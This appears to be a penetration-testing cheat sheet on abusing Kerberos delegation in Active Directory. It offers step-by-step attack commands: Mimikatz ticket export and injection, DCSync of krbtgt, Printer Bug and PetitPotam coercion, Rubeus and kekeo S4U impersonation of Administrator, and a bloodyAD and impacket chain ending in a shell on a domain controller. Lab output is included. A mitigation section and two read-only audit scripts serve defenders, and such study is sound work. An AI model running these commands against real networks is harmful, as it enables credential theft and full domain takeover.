Trustee and Resource Delegation

Exploiting Delegation

Delegations

ADeleginator

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Discovery

  • PowerView

Get-DomainComputer -UnConstrained
  • AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect, then export the cached tickets:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse the DA TGT

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

How to make a high-privilege account connect to the machine with unconstrained delegation? The Printer Bug.

See also: Misconfiguration > Print Spooler

Capture the TGT of dc$ by running Rubeus in monitor mode on the victim server (the one with unconstrained delegation)

Rubeus.exe monitor /interval:5 /nowrap

Printer Bug: run MS-RPRN.exe against the DC, pointing it at the victim server

MS-RPRN.exe \\dc.domain.local \\victim.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

Coercion traffic goes over SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

Copy the base64-encoded TGT and remove any extra spaces before using it

Rubeus.exe ptt /ticket:<Base64>

Or write the base64 ticket to a .kirbi file and inject it with Invoke-Mimikatz:

[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\USDC.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
See also: DCSync

Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

  • Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.

  • Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.

  • Ensure privileged user objects are members of the Protected Users security group. Members of this security group cannot be delegated.

  • Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
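The four controls above can be audited from a management host. The following script is an added example (not part of the original page or the cited ACSC guidance); it is read-only and assumes the RSAT ActiveDirectory module under Windows PowerShell 5.1, since Get-Service -ComputerName is not available in PowerShell 7.

```powershell
# Added audit example (not from the original page). Read-only: reports where the
# four mitigation controls are not in place. Assumes the RSAT ActiveDirectory module
# and Windows PowerShell 5.1 (Get-Service -ComputerName was removed in PowerShell 7).
Import-Module ActiveDirectory

function Get-DelegationMitigationReport {
    # Control 1: computers trusted for unconstrained delegation (userAccountControl 0x80000).
    # Domain Controllers are unconstrained by design, so they are excluded (primaryGroupID 516).
    $unconstrained = Get-ADComputer -Filter {TrustedForDelegation -eq $True} -Properties PrimaryGroupID |
        Where-Object { $_.PrimaryGroupID -ne 516 } | Select-Object -ExpandProperty Name

    # Controls 2 and 3: privileged users lacking 'Account is sensitive and cannot be
    # delegated' (userAccountControl 0x100000) or not members of Protected Users.
    # Enterprise Admins exists only in the forest root domain, hence SilentlyContinue.
    $privGroups = 'Domain Admins', 'Enterprise Admins', 'Administrators'
    $privUsers  = $privGroups | ForEach-Object {
            Get-ADGroupMember -Identity $_ -Recursive -ErrorAction SilentlyContinue
        } | Where-Object { $_.objectClass -eq 'user' } | Sort-Object -Property DistinguishedName -Unique
    $protected  = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive |
        Select-Object -ExpandProperty DistinguishedName)
    $exposedUsers = foreach ($u in $privUsers) {
        $acct = Get-ADUser -Identity $u.DistinguishedName -Properties AccountNotDelegated
        if (-not $acct.AccountNotDelegated -or ($protected -notcontains $acct.DistinguishedName)) {
            [pscustomobject]@{
                User           = $acct.SamAccountName
                NotDelegated   = [bool]$acct.AccountNotDelegated
                ProtectedUsers = $protected -contains $acct.DistinguishedName
            }
        }
    }

    # Control 4: Print Spooler still installed and not disabled on Domain Controllers.
    $dcHosts = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
    $spooler = Get-Service -Name Spooler -ComputerName $dcHosts -ErrorAction SilentlyContinue |
        Where-Object { $_.Status -eq 'Running' -or $_.StartType -ne 'Disabled' } |
        Select-Object MachineName, Status, StartType

    [pscustomobject]@{
        UnconstrainedComputers = @($unconstrained)
        ExposedPrivilegedUsers = @($exposedUsers)
        SpoolerOnDCs           = @($spooler)
    }
}

$report = Get-DelegationMitigationReport
$report.UnconstrainedComputers
$report.ExposedPrivilegedUsers | Format-Table -AutoSize
$report.SpoolerOnDCs | Format-Table -AutoSize
```

An empty result in all three properties means the four controls are in place for the accounts and hosts the script could read.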

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to the services listed in its msDS-AllowedToDelegateTo attribute

Service for User (S4U) Kerberos extensions are used to impersonate a user

S4U2self: allows a service to obtain a forwardable TGS to itself on behalf of a user - requires the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition)

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains the list of SPNs to which the ticket can be forwarded

Discovery

  • PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
  • AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with kekeo

The password or NTLM/AES keys of the service account are required

  1. Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>
  2. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL
  3. Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
ls \\mssql.domain.local\c$
Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
ls \\mssql.domain.local\c$

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo (computer account trusted for delegation to the DC)

The password or NTLM/AES keys of the computer account are required

  1. Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>
  2. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL
  3. Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus (computer account)

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo

See also: Persistence

Resource-based Constrained Delegation

Instead of SPNs in msDS-AllowedToDelegateTo on the front-end service, access is controlled by a security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service

The administrator of the resource can configure this delegation, whereas the other delegation types require the SeEnableDelegationPrivilege, held by default only by Domain Admins

Two things are needed to abuse RBCD:

  1. Write permissions over the target service

  2. Control over an object which has an SPN configured (such as admin access to a domain-joined machine, or the ability to join a machine to the domain - ms-DS-MachineAccountQuota is 10 by default)
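From the defender's side, both requirements map to two attributes worth inventorying: who has been granted msDS-AllowedToActOnBehalfOfOtherIdentity on each resource, and whether ms-DS-MachineAccountQuota still lets ordinary users create the SPN-bearing account. The script below is an added example (not from the original page); it is read-only and assumes the RSAT ActiveDirectory module, which returns the descriptor attribute as an ActiveDirectorySecurity object.

```powershell
# Added example (not from the original page): inventories resource-based constrained
# delegation and the domain's MachineAccountQuota. Read-only; assumes the RSAT
# ActiveDirectory module.
Import-Module ActiveDirectory

function Get-RbcdReport {
    $domain = Get-ADDomain
    # ms-DS-MachineAccountQuota lives on the domain head; 10 is the default, 0 prevents
    # ordinary users from creating the machine account the second requirement relies on.
    $quota = (Get-ADObject -Identity $domain.DistinguishedName `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

    # Resources (computers or service accounts) with msDS-AllowedToActOnBehalfOfOtherIdentity
    # set. The module exposes it as an ActiveDirectorySecurity object (assumed here); each
    # Allow ACE names one front-end principal permitted to delegate to this resource.
    $resources = Get-ADObject -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, servicePrincipalName
    $entries = foreach ($r in $resources) {
        $sd = $r.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        foreach ($ace in $sd.Access) {
            [pscustomobject]@{
                Resource   = $r.Name
                Class      = $r.ObjectClass
                # IdentityReference is DOMAIN\name when resolvable, otherwise the raw SID string.
                FrontEnd   = $ace.IdentityReference.Value
                AccessType = $ace.AccessControlType
                SPNs       = ($r.servicePrincipalName -join ';')
            }
        }
    }

    [pscustomobject]@{
        MachineAccountQuota = $quota
        Delegations         = @($entries)
    }
}

$report = Get-RbcdReport
"ms-DS-MachineAccountQuota: $($report.MachineAccountQuota)"
$report.Delegations | Format-Table -AutoSize
```

Any FrontEnd entry that is not an expected service host (for example a freshly created machine account) is worth a closer look, as is a quota above 0 in a domain where users have no business joining machines.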

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract the AES keys of computer1$ (a computer account we control)

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key to access victim as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
winrs -r:victim cmd.exe

With Impacket

In this example, L.BIANCHI_ADM is a DA

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName  -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse a Kerberos-only constrained delegation configuration (no protocol transition)

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Create a new machine account with Powermad

https://github.com/Kevin-Robertson/Powermad

. .\Powermad.ps1
New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host: obtain a TGT as victim$ (the computer account can write its own msDS-AllowedToActOnBehalfOfOtherIdentity)
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get the RC4 hash of the studentcompX$ password
Rubeus.exe hash /password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Use that TGS as evidence to request a forwardable TGS for the final target

Rubeus.exe s4u /tgs:<base64_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe
